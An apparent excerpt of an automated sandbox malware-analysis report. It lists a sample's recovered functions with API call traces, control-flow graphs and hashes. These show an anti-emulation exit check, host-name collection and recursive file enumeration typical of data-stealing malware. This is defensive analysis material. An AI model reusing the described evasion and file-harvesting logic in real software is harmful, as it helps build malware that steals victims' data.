                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 2de34e9434d25c10897cd4fd4768559ea311af00b66252759ebec05747c0cfd9
                                    • Instruction ID: 924d017315ba98c82c442e5d1ba8ab6a8274948a3329d582b57bdc62836c2eca
                                    • Opcode Fuzzy Hash: 2de34e9434d25c10897cd4fd4768559ea311af00b66252759ebec05747c0cfd9
                                    • Instruction Fuzzy Hash: BDF027701082446BEB106AE4E80E7AEF7D8EB02350F140A2DEF9AC2180E370CC408127
                                    Function 000B8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2895 b8c88-b8cc4 StrCmpCA 2897 b8ccd-b8ce6 2895->2897 2898 b8cc6-b8cc7 ExitProcess 2895->2898 2900 b8cec-b8cf1 2897->2900 2901 b8ee2-b8eef call a2a20 2897->2901 2903 b8cf6-b8cf9 2900->2903 2904 b8cff 2903->2904 2905 b8ec3-b8edc 2903->2905 2907 b8e88-b8e9a lstrlen 2904->2907 2908 b8e6f-b8e7d StrCmpCA 2904->2908 2909 b8d06-b8d15 lstrlen 2904->2909 2910 b8d84-b8d92 StrCmpCA 2904->2910 2911 b8da4-b8db8 StrCmpCA 2904->2911 2912 b8d5a-b8d69 lstrlen 2904->2912 2913 b8dbd-b8dcb StrCmpCA 2904->2913 2914 b8ddd-b8deb StrCmpCA 2904->2914 2915 b8dfd-b8e0b StrCmpCA 2904->2915 2916 b8e1d-b8e2b StrCmpCA 2904->2916 2917 b8e3d-b8e4b StrCmpCA 2904->2917 2918 b8d30-b8d3f lstrlen 2904->2918 2919 b8e56-b8e64 StrCmpCA 2904->2919 2905->2901 2945 b8cf3 2905->2945 2926 b8e9c-b8ea1 call a2a20 2907->2926 2927 b8ea4-b8eb0 call a2930 2907->2927 2908->2905 2925 b8e7f-b8e86 2908->2925 2921 b8d1f-b8d2b call a2930 2909->2921 2922 b8d17-b8d1c call a2a20 2909->2922 2910->2905 2933 b8d98-b8d9f 2910->2933 2911->2905 2930 b8d6b-b8d70 call a2a20 2912->2930 2931 b8d73-b8d7f call a2930 2912->2931 2913->2905 2934 b8dd1-b8dd8 2913->2934 2914->2905 2935 b8df1-b8df8 2914->2935 2915->2905 2936 b8e11-b8e18 2915->2936 2916->2905 2920 b8e31-b8e38 2916->2920 2917->2905 2923 b8e4d-b8e54 2917->2923 2928 b8d49-b8d55 call a2930 2918->2928 2929 b8d41-b8d46 call a2a20 2918->2929 2919->2905 2924 b8e66-b8e6d 2919->2924 2920->2905 2954 b8eb3-b8eb5 2921->2954 2922->2921 2923->2905 2924->2905 2925->2905 2926->2927 2927->2954 2928->2954 2929->2928 2930->2931 2931->2954 2933->2905 2934->2905 2935->2905 2936->2905 2945->2903 2954->2905 2955 b8eb7-b8eb9 2954->2955 2955->2905 2956 b8ebb-b8ebd lstrcpy 2955->2956 2956->2905
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: bb20fd197d16dd550077a8fc40f0365c85f766b4022359786c0be60bbbd875a4
                                    • Instruction ID: 1de6b268110dc303e6ebcd26a357c17ba6a9a597033a9e9684d1dbcf75ceee48
                                    • Opcode Fuzzy Hash: bb20fd197d16dd550077a8fc40f0365c85f766b4022359786c0be60bbbd875a4
                                    • Instruction Fuzzy Hash: F1E09224505355EBCB14ABB9ECE8E927BA8EF99300B40189AF6058F695DA306D04CB76
                                    Function 000C2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2957 c2ad0-c2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 c2b44-c2b59 2957->2958 2959 c2b24-c2b36 2957->2959
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2AFF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2B06
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 000C2B1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: cd0e1f59fab273057e542ed1be8f0fb81342f6d07e4ed7067c012151356792de
                                    • Instruction ID: d2ab6d77fb29ef372df4b805f57e84bee5bd8463bea123660ef5ab0b54f331b8
                                    • Opcode Fuzzy Hash: cd0e1f59fab273057e542ed1be8f0fb81342f6d07e4ed7067c012151356792de
                                    • Instruction Fuzzy Hash: 8701A272A45248ABC710DF99EC49B9DF7B8F745B22F00026BF915D3780D775190086A1
                                    Function 000A100E Relevance: 4.5, APIs: 3, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                    • ExitProcess.KERNEL32 ref: 000A1058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000A106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 000A10AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: ed50cfdab9a21dab181dfdcc3edebb3c706d53b6c9f06108b6da687544b84a1b
                                    • Instruction ID: a619027a9a6dcec988ba518235da02c464c0c6d0c352904d43f68f2a96f263ab
                                    • Opcode Fuzzy Hash: ed50cfdab9a21dab181dfdcc3edebb3c706d53b6c9f06108b6da687544b84a1b
                                    • Instruction Fuzzy Hash: 43E012B4A4A3457FFB2117A17C0EF127F2CAB12B06F104005F305F50D2D5D5A9419A65

                                    Non-executed Functions

                                    Function 000B2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B23D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B23F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2402
                                    • lstrlen.KERNEL32(\*.*), ref: 000B240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B2436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B2486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: c7fb711d4a19ce0a0bddc7d6627244376ca229f1edc030126a8f56e6fb130b9e
                                    • Instruction ID: f0117dbce5434c2412f65cba69fa8388abbd874b58cdd9f0d73a48c5c55e3d2d
                                    • Opcode Fuzzy Hash: c7fb711d4a19ce0a0bddc7d6627244376ca229f1edc030126a8f56e6fb130b9e
                                    • Instruction Fuzzy Hash: C0A29F30E11216AFDB61AFB8EC89AEE77F9AF15700F044029F849E7262DB34DD418B51
                                    Function 000A16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A16E2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A176C
                                    • lstrcat.KERNEL32(00000000), ref: 000A1776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A17F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1825
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1875
                                    • lstrcat.KERNEL32(00000000), ref: 000A187F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A18AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A18F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A18FE
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1909
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1929
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1935
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A195B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1966
                                    • lstrlen.KERNEL32(\*.*), ref: 000A1971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A198E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000A199A
                                      • Part of subcall function 000C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 000C406D
                                      • Part of subcall function 000C4040: lstrcpy.KERNEL32(00000000,?), ref: 000C40A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A19C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1A0E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1A16
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1A21
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1A41
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1A4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1A76
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1A81
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1AAC
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1AB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1ADE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1AE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1B11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000A1B45
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000A1B70
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000A1B8A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1BC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1BFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1C03
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1C0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1C31
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1C69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1C74
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1C7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1CA2
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1CAE
                                    • lstrlen.KERNEL32(?), ref: 000A1CBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1CDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1CE9
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1CF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1D14
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1D20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1D46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1D51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1D7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1DE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1DEB
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1DF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1E19
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1E25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1E4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1E56
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1E61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1E81
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1E8D
                                    • lstrlen.KERNEL32(?), ref: 000A1E9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1EBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1EC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1EF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1F3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000A1F45
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1F9F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A1FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1FE3
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A200E
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A2042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A204D
                                    • lstrlen.KERNEL32(000D1794), ref: 000A2058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2075
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: ac6d1caec6909c1f1cfa0acae1f2cc4b07b441ea0964a664d2cee463d06f77de
                                    • Instruction ID: 5eb5d959207584bc32269233c4a7bbbe42b501d17a21cc3c80f355269e74315d
                                    • Opcode Fuzzy Hash: ac6d1caec6909c1f1cfa0acae1f2cc4b07b441ea0964a664d2cee463d06f77de
                                    • Instruction Fuzzy Hash: 84925131A112169FCB61EFE8ED88AEF77B9AF16700F044135F805A7262DB34DD418BA1
                                    Function 000ADB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADBEF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000ADBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC17
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000ADC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC4C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADC8F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000ADCD0
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000ADCF0
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000ADD0A
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000ADD1D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADD7B
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDA3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADDAF
                                    • lstrlen.KERNEL32(?), ref: 000ADDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000ADDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADE19
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADE6F
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADE7B
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADEBB
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADEE6
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADEF2
                                    • lstrlen.KERNEL32(00E689D0), ref: 000ADF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFA5
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADFB1
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADFF4
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE022
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000AE02E
                                    • lstrlen.KERNEL32(00E689D0), ref: 000AE03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE063
